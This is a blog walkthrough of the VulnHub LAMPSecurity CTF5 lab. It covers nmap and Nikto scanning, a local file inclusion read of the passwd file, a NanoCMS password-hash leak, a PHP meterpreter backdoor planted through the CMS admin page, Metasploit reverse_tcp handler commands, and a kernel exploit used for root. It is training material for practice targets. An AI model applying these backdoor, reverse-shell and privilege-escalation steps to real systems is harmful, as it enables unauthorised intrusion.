April 27, 2019

LAMP Security CTF5 Walk through



Hello readers, today we are going to solve another CTF challenge “LAMPSecurity CTF5” (download it from here //www.vulnhub.com/entry/lampsecurity-ctf5,84). This is a beginner level challenge. We will try to break the privilege and gain the root access. So let’s get started.
List of actions:
  • Scan the network
  • Enumerate HTTP service
  • Scan the web application with Nikto for more information
  • Identify the vulnerable CMS application
  • Create PHP BackDoor using msfvenom
  • Upload and execute the backdoor inside the target
  • Get TTY shell access using python
  • Exploit the target
  • Gain the root privilege

Scan the network
At first discover the target with netdiscover tool



We have got our target - >  172.16.2.169



Now open the Kali machine and scan the target for open ports and running services using nmap.



Based on the above result we can see there are multiple services are running on different open ports(22,25,80,110,111,139,143,445,901,3306,37459)

Enumerate HTTP service
As we can see the HTTP service is running on this VM let’s start browse through it.
Browsed over 172.16.2.169 gives us a webpage with Phake Organization header and a navigation menu bar.



Scan the web application with Nikto for more information



From the above scan it shows us the application is vulnerable to LFI. So try to get the passwd file with the following input.



We have successfully got the passwd file content, which we can use later if required.

Identify the vulnerable CMS application
Clicking on the blog tab redirects it to the 172.16.2.169/~andy/



If we closely see at the bottom of the page it is powered by NanoCMS. Which is really a backdated CMS and there is no use of it because of security. We will try to get any vulnerability related to this CMS and exploit it.
After googling it, we got the below result



Let’s go to the site and understand the vulnerability
According to security focus NanoCMS is vulnerable to Password hash information Discloser Vulnerability on the below path.
/data/pagesdata.txt



Now try to append the path with the URL and see what we can get.



The above page disclose the admin password hash. We will try to crack the md5 hash on hashkiller.co.uk



Result




We have successfully cracked the hash, the password for the admin account is “shannon”.
Now click on Admin Login to get the login page of admin panel.



  Put the admin credentials on it and login to get inside the account.



Create PHP BackDoor using msfvenom
In the admin panel window we got the new page option lets click on it.



This page will allow us to add content into the website. Using this feature we will try to upload a backdoor and create a meterpreter session.
Execute the following msfvenom command and copy the backdoor starting from <?php to die(); and paste it inside the new page content



Give any name to Page Title (e.g: exploitable) and then click on Add Page button.



We have successfully added the backdoor and after visiting the web site we can see it on the Navigation window.



Now open the msfconsole and run the exploit
Msf5> Use exploit/multi/handler
Msf5> set payload php/meterpreter/reverse_tcp
Msf5> set lhost 172.16.2.155
Msf5> set lport 4444
Msf5> run



Now open the website and load the exploit



We have successfully created the meterpreter session.



Upload and execute the backdoor inside the target
Run sysinfo command to get the system version



The above result shows the server is running on linux 2.6.23.1-42 version. Using this info we will try to find out if there is any exploit exits to escalate the root privilege.
After multiple search we have got the below exploit to escalate the privilege for this version of linux.



Now download the exploit using wget command.



Compile the exploite using gcc compiler



Get TTY shell access using python
Now get back to the meterpreter session and navigate to /tmp folder
cd /t



Now upload the exploit from kali machine to the target using meterpreter session.
upload /root/exploit exploit



Now again navigate to shell








Execute python one liner script to get the Bash shell




We have successfully got the restricted bash shell. Now nefigate to /tmp and run the ls –l  commend to check the uploaded exploit.



Exploit the target
Now run the below command to exploit the target
Env - ./exploitt




Gain the root privilege
run the id command to verify the root user



Great!! We have got the root privilege successfully and accomplished the challenge. Please let me know if you have any doubt on the same article I will see you soon with another CTF. Happy Hacking!!


0 comments:

Post a Comment